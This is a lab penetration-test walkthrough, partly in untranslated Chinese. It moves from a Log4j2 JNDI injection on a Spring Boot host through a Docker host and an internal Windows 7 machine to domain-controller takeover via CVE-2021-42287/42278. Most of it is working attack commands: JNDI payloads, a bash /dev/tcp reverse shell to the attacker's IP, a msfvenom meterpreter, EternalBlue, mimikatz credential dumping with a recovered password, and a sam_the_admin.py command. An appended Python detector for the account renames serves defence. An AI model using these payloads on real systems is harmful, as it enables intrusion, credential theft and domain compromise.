Preface
A write-up of a lab penetration: getting into the internal network through Log4j2, then using CVE-2021-42287 and CVE-2021-42278 to obtain domain controller privileges.
External foothold
First, port-scan the web host: ports 38080 and 22 are open.
Visiting port 38080 shows an error page.
Checking the stack with Wappalyzer does not seem to detect anything.
Searching the error message on Baidu suggests it should be Spring Boot.
So I scanned it with goby as well: it is indeed Spring, but no vulnerabilities are reported. Thinking of the recently disclosed Log4j2 vulnerability, it may simply be doing logging without a vulnerable framework in front of it.
Use the payload payload=${jndi:ldap://p9j8l8.dnslog.cn}
The DNS callback arrives, which confirms the vulnerability exists.
To exploit it further, first start an LDAP server, with the IP set to the local address that will receive the shell:
<pre>java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105</pre>
Intercept the request, change Content-Type to application/x-www-form-urlencoded, and send the following payload; the command output is echoed back successfully:
<pre>payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}</pre>
Running ls -al / to check also succeeds.
Start an nc listener.
Then use the bash reverse shell command; it must first be base64-encoded, and the special characters in the encoded string then URL-encoded twice:
<pre>bash -i >& /dev/tcp/192.168.1.105/9999 0>&1</pre>
Intercept the request and add payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/Command/Base64/<double-URL-encoded string>} to obtain the reverse shell.
Information gathering shows this is a Docker environment. I tried a Docker escape here but it failed, so I continued gathering information.
The first flag is in the root directory, together with a "got this" hint. Since port 22 was seen open in the earlier port scan, try connecting directly over SSH.
Try connecting with Xshell.
The connection succeeds, giving access to the host machine.
ifconfig shows another NIC on the 10.0.1.0/24 segment.
For convenience you could bring the Linux host into Cobalt Strike and continue from there; I did not use CS here and instead used Linux commands to probe for live hosts on 10.0.1.0/24:
<pre>for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo "$i Find the target"; fi; done</pre>
A ping shows the host is alive.
Use Venom to proxy the traffic out; first start the listener:
<pre>admin.exe -lport 7777</pre>
Then upload agent_linux to the target, make it executable, and run it:
<pre>chmod 777 agent_linux_x86
./agent_linux_x86 -rhost 192.168.1.105 -rport 7777</pre>
Connected.
I originally meant to proxy from Venom into msf, but that felt cumbersome, so I just generated an ELF payload with Kali and brought the host into msf directly.
First generate a 32-bit ELF payload:
<pre>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf</pre>
Then make it executable and run it:
<pre>chmod 777 shell.elf
./shell.elf</pre>
Use exploit/multi/handler in Kali to listen.
This gives a shell on the host machine.
然后添加10.0.1.0/24段的路由
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bg
route add 10.0.1.0 255.255.255.0 1
route print</pre>
然后配置proxychain4.conf
文件并使用socks模塊
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">search socks
use auxiliary/sevrer/socks_proxy
run</pre>
我們在之前已經(jīng)知道了內(nèi)網(wǎng)主機的ip压固,那么這里我們直接使用proxychain配合nmap對10.0.1.7的端口進行掃描
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains4 nmap -sT -Pn 10.0.1.7</pre>
Port 445 is open, so scan it further.
First determine the OS version with the auxiliary/scanner/smb/smb_version module: it is Windows 7 SP1.
Check whether EternalBlue can be used, with the auxiliary/scanner/smb/smb_ms17_010 module: it is exploitable.
Use the exploit/windows/smb/ms17_010_eternalblue module; since the host has no outbound network access, a bind_tcp payload is needed.
After run, we get a meterpreter with SYSTEM privileges.
The second flag is in C:\Users\root\Desktop.
Continuing with information gathering, this host also has two NICs, with another one on the 10.0.0.0/24 segment.
ipconfig /all shows the DNS server is redteam.lab, so the host should be in a domain.
Ping redteam.lab: the domain controller's IP is 10.0.0.12.
Not knowing what vulnerabilities the DC has, first upload mimikatz and dump the passwords, obtaining Administrator/Admin12345. At this point one could simply connect with the domain admin account over IPC, but since a domain user was also captured, try the latest CVE-2021-42287 / CVE-2021-42278 attack instead. For the principle behind the vulnerability, please refer to the relevant write-up.
<pre>privilege::debug
sekurlsa::logonpasswords</pre>
I intended to use noPac.exe to get a shell directly, but noPac.exe requires a .NET 4.0 environment on the host, so there was no output here.
noPac.exe download address: https://github.com/cube0x0/noPac
I originally planned to do it step by step the original way, but PowerShell is unusable and gives no output, so I will just write down the original exploitation steps:
- First create a machine account, using impacket's addcomputer.py or Powermad. `addcomputer.py` creates the machine account over the `SAMR protocol`; an account created this way has no SPN, so it does not need to be cleared.
- Clear the machine account's servicePrincipalName attribute.
- Change the machine account's sAMAccountName to the DC's machine account name, without the trailing $.
- Request a TGT for the machine account.
- Change the machine account's sAMAccountName to another name; anything that differs from step 3 will do.
- Request an ST from the DC via S4U2self.
- Perform a DCSync attack.
Here I use sam_the_admin.py to attack directly:
<pre>proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell</pre>
This yields a shell on the DC.
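Added as a defender-side example (not the write-up's own code): a Python check over constructed account-rename events that flags the two sAMAccountName changes in the procedure above, a machine account losing its trailing $ and taking a DC's name, and the later rename away. The event field names (EventID 4781, OldTargetUserName, NewTargetUserName, SubjectUserName) and the DC account list are assumptions to map onto your own log schema.

```python
# Defender-side check for the sAMAccountName renames in the procedure above: a machine
# account losing its trailing '$' and/or taking a domain controller's name. Event records
# are constructed dicts whose field names are assumed to follow Windows event 4781
# ("The name of an account was changed"); adjust them to your log pipeline's schema.

DC_ACCOUNTS = {"DC01$"}  # constructed; in practice, load from the Domain Controllers OU


def normalize(name):
    """Compare names without the machine-account suffix and case-insensitively."""
    return name.rstrip("$").upper()


def check_rename(event, dc_accounts=DC_ACCOUNTS):
    """Return the reasons a rename event looks like CVE-2021-42278 abuse (empty if none)."""
    if event.get("EventID") != 4781:
        return []
    old, new = event["OldTargetUserName"], event["NewTargetUserName"]
    dc_names = {normalize(d) for d in dc_accounts}
    reasons = []
    if old.endswith("$") and not new.endswith("$"):
        reasons.append("machine account renamed to a name without trailing $")
    if normalize(new) in dc_names:
        reasons.append("new name collides with a domain controller account")
    if not old.endswith("$") and normalize(old) in dc_names:
        reasons.append("account carrying a DC's name renamed away (cleanup step)")
    return reasons


def scan_events(events, dc_accounts=DC_ACCOUNTS):
    """Return (actor, old name, new name, reasons) for every suspicious rename."""
    alerts = []
    for ev in events:
        reasons = check_rename(ev, dc_accounts)
        if reasons:
            alerts.append((ev["SubjectUserName"], ev["OldTargetUserName"],
                           ev["NewTargetUserName"], reasons))
    return alerts


# Constructed events: a routine rename, the two renames of the attack, and an unrelated event.
EVENTS = [
    {"EventID": 4781, "SubjectUserName": "helpdesk", "OldTargetUserName": "WS-0042$", "NewTargetUserName": "WS-0099$"},
    {"EventID": 4781, "SubjectUserName": "root", "OldTargetUserName": "NEWPC$", "NewTargetUserName": "DC01"},
    {"EventID": 4781, "SubjectUserName": "root", "OldTargetUserName": "DC01", "NewTargetUserName": "NEWPC$"},
    {"EventID": 4742, "SubjectUserName": "root", "OldTargetUserName": "", "NewTargetUserName": ""},
]
```

Running scan_events(EVENTS) reports only the two "root" renames, which is the pair a SOC would correlate with the TGT and S4U2self requests made in between.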
The last flag is in C:\Users\Administrator\Desktop.